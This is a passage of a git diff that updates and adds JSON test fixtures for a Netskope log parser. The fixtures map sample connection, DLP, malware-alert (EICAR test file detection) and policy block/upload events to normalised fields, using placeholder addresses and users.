index 29f3c0723..5c5218356 100644 --- a/Netskope/netskope_events/tests/test_connection_log.json +++ b/Netskope/netskope_events/tests/test_connection_log.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"_id\": \"69573873d4de0a4f1d2cbac4\",\n \"access_method\": \"Client\",\n \"app\": \"Swile\",\n \"appcategory\": \"HR\",\n \"bypass_reason\": \"SSL Do Not Decrypt Bypass Policy Matched\",\n \"bypass_traffic\": \"yes\",\n \"category\": \"HR\",\n \"cci\": 16,\n \"ccl\": \"poor\",\n \"connection_id\": 0,\n \"count\": 1,\n \"domain\": \"test.example.org\",\n \"dst_country\": \"FR\",\n \"dst_geoip_src\": 1,\n \"dst_latitude\": 48.85836410522461,\n \"dst_location\": \"Paris\",\n \"dst_longitude\": 2.294532060623169,\n \"dst_region\": \"Ile-de-France\",\n \"dst_timezone\": \"Europe/Paris\",\n \"dst_zipcode\": \"N/A\",\n \"dstip\": \"5.6.7.8\",\n \"dstport\": 443,\n \"netskope_pop\": \"FR-PAR1\",\n \"organization_unit\": \"\",\n \"other_categories\": [\n \"Finance/Accounting\",\n \"All Categories\",\n \"HR\"\n ],\n \"page\": \"test.example.org\",\n \"policy\": \"bypass_ssl for regulation purpose\",\n \"request_id\": 1111111111111111111,\n \"site\": \"Swile\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 17:12:00 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.5.6.7\",\n \"ssl_decrypt_policy\": \"yes\",\n \"timestamp\": 1671639140,\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 0,\n \"type\": \"connection\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"test.example.org\",\n \"user\": \"john.doe@example.org\",\n \"user_generated\": \"yes\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"org\": \"\",\n \"http_transaction_count\": 0,\n \"network\": \"\",\n \"useragent\": \"\",\n \"dsthost\": \"\",\n \"numbytes\": 0,\n \"CononicalName\": \"\",\n \"os_version\": \"\",\n \"browser_session_id\": 0,\n \"resp_cnt\": 0,\n \"log_file_name\": \"\",\n \"suppression_end_time\": 0,\n \"browser_version\": \"\",\n \"severity\": \"\",\n \"client_bytes\": 0,\n \"suppression_start_time\": 0,\n \"app_session_id\": 0,\n \"sAMAccountName\": \"\",\n \"req_cnt\": 0,\n \"device\": \"\",\n \"browser\": \"\",\n \"userPrincipalName\": \"\",\n \"conn_endtime\": 1671639139,\n \"conn_duration\": 3,\n \"protocol\": \"\",\n \"fromlogs\": \"\",\n \"serial\": \"\",\n \"resp_content_len\": 0,\n \"dynamic_classification\": \"\",\n \"hostname\": \"\",\n \"os\": \"\",\n \"server_bytes\": 0,\n \"conn_starttime\": 1671639136,\n \"sessionid\": \"\",\n \"resp_content_type\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "network" ], diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json index 66c901c90..37ab6e32b 100644 --- a/Netskope/netskope_events/tests/test_dlp_incident.json +++ b/Netskope/netskope_events/tests/test_dlp_incident.json @@ -30,7 +30,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "mime_type": "eicar.txt" + "mime_type": "eicar.txt", + "size": 19154 }, "http": { "request": { diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json index 63497504d..5e5f6de15 100644 --- a/Netskope/netskope_events/tests/test_malware_alert.json +++ b/Netskope/netskope_events/tests/test_malware_alert.json @@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"Detection\",\n \"activity\": \"Download\",\n \"alert\": \"yes\",\n \"alert_type\": \"Malware\",\n \"app\": \"eicar\",\n \"app_session_id\": 111111111111111111,\n \"appcategory\": \"n/a\",\n \"browser\": \"Safari\",\n \"category\": \"n/a\",\n \"cci\": \"\",\n \"ccl\": \"unknown\",\n \"connection_id\": 0,\n \"count\": 1,\n \"device\": \"Mac Device\",\n \"dst_country\": \"US\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 47.6711,\n \"dst_location\": \"Redmond\",\n \"dst_longitude\": -122.1253,\n \"dst_region\": \"Washington\",\n \"dst_timezone\": \"America/Los_Angeles\",\n \"dst_zipcode\": \"98073\",\n \"dstip\": \"5.6.7.8\",\n \"file_path\": \"NA\",\n \"file_size\": 308,\n \"file_type\": \"File Type Not Detected\",\n \"hostname\": \"MacBook Pro\",\n \"instance\": null,\n \"managementID\": \"99999999999999999999999999999999\",\n \"md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"mime_type\": \"\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"eicarcom2.zip\",\n \"object_id\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Monterey\",\n \"referer\": \"https://www.eicar.org/\",\n \"request_id\": 2222222222222222222,\n \"severity\": \"high\",\n \"site\": \"eicar\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"timestamp\": 1671631928,\n \"title\": \"eicarcom2.zip\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 3333333333333333333,\n \"tss_mode\": \"inline\",\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"secure.eicar.org/eicarcom2.zip\",\n \"user\": \"john.doe@example.org\",\n \"user_id\": \"john.doe@example.org\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"browser_version\": \"\",\n \"owner\": \"\",\n \"dlp_incident_id\": 0,\n \"channel_id\": \"\",\n \"from_user_category\": \"\",\n \"resp_cnt\": 0,\n \"suppression_key\": \"\",\n \"loginurl\": \"\",\n \"total_collaborator_count\": 0,\n \"os_version\": \"\",\n \"dlp_rule\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"instance_id\": \"\",\n \"to_user\": \"\",\n \"suppression_end_time\": 0,\n \"fromlogs\": \"\",\n \"dlp_parent_id\": 0,\n \"dstport\": 0,\n \"dst_timezone\": \"\",\n \"serial\": \"\",\n \"audit_category\": \"\",\n \"sha256\": \"\",\n \"from_user\": \"\",\n \"sAMAccountName\": \"\",\n \"app_activity\": \"\",\n \"useragent\": \"\",\n \"netskope_activity\": \"\",\n \"conn_duration\": 0,\n \"other_categories\": [],\n \"custom_connector\": \"\",\n \"dlp_rule_severity\": \"\",\n \"numbytes\": 0,\n \"telemetry_app\": \"\",\n \"true_obj_category\": \"\",\n \"userPrincipalName\": \"\",\n \"logintype\": \"\",\n \"suppression_start_time\": 0,\n \"browser_session_id\": 0,\n \"dlp_profile\": \"\",\n \"src_time\": \"\",\n \"modified\": 0,\n \"policy\": \"\",\n \"policy_id\": \"\",\n \"notify_template\": \"\",\n \"audit_type\": \"\",\n \"orignal_file_path\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"org\": \"\",\n \"user_category\": \"\",\n \"dlp_unique_count\": 0,\n \"exposure\": \"\",\n \"netskope_pop\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"sanctioned_instance\": \"\",\n \"device_classification\": \"\",\n \"data_type\": \"\",\n \"scan_type\": \"\",\n \"internal_collaborator_count\": 0,\n \"CononicalName\": \"\",\n \"workspace\": \"\",\n \"log_file_name\": \"\",\n \"parent_id\": \"\",\n \"true_obj_type\": \"\",\n \"dlp_rule_count\": 0,\n \"sessionid\": \"\",\n \"workspace_id\": \"\",\n \"page_site\": \"\",\n \"universal_connector\": \"\",\n \"server_bytes\": 0,\n \"req_cnt\": 0,\n \"file_lang\": \"\",\n \"protocol\": \"\",\n \"web_universal_connector\": \"\",\n \"dsthost\": \"\",\n \"appsuite\": \"\",\n \"managed_app\": \"\",\n \"page\": \"\"\n}\n", "event": { - "action": "Download", + "action": "Detection", "category": [ "malware" ], @@ -36,7 +36,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "name": "eicarcom2.zip" + "name": "eicarcom2.zip", + "size": 308 }, "host": { "name": "MacBook Pro", diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json new file mode 100644 index 000000000..0d739d4fd --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_block.json @@ -0,0 +1,109 @@ +{ + "input": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "event": { + "action": "block", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:01:32Z", + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "San Francisco", + "country_iso_code": "US", + "location": { + "lat": 37.775699615478516, + "lon": -122.39520263671875 + }, + "postal_code": "N/A", + "region_name": "California", + "timezone": "America/Los_Angeles" + }, + "ip": "1.2.3.4" + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 11", + "platform": "windows", + "type": "windows", + "version": "Windows NT 11.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "General", + "name": "DNS Over HTTPS" + }, + "ccl": "unknown" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "john.doe" + ] + }, + "rule": { + "id": "99999999999999999999999999999999 2024-10-30 13:52:18.401518", + "name": "Block DoH - incompatibility with Netskope" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.8323, + "lon": 2.4075 + }, + "postal_code": "75018", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "test.example.com", + "path": "test.example.com" + }, + "user": { + "domain": "mail.fr", + "email": "john.doe@mail.fr", + "name": "john.doe" + }, + "user_agent": { + "name": "Chrome" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json index 25513a172..d0d9ed304 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_log.json +++ b/Netskope/netskope_events/tests/test_nspolicy_log.json @@ -43,7 +43,8 @@ "md5": "68b329da9893e34099c7d8ad5cb9c940" }, "mime_type": "image/gif", - "name": "giphy2.gif" + "name": "giphy2.gif", + "size": 204299 }, "host": { "name": "TEST-1111111", diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json new file mode 100644 index 000000000..b05f61a9d --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json @@ -0,0 +1,120 @@ +{ + "input": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "event": { + "action": "Upload", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "event", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:04:46Z", + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "Prague", + "country_iso_code": "CZ", + "location": { + 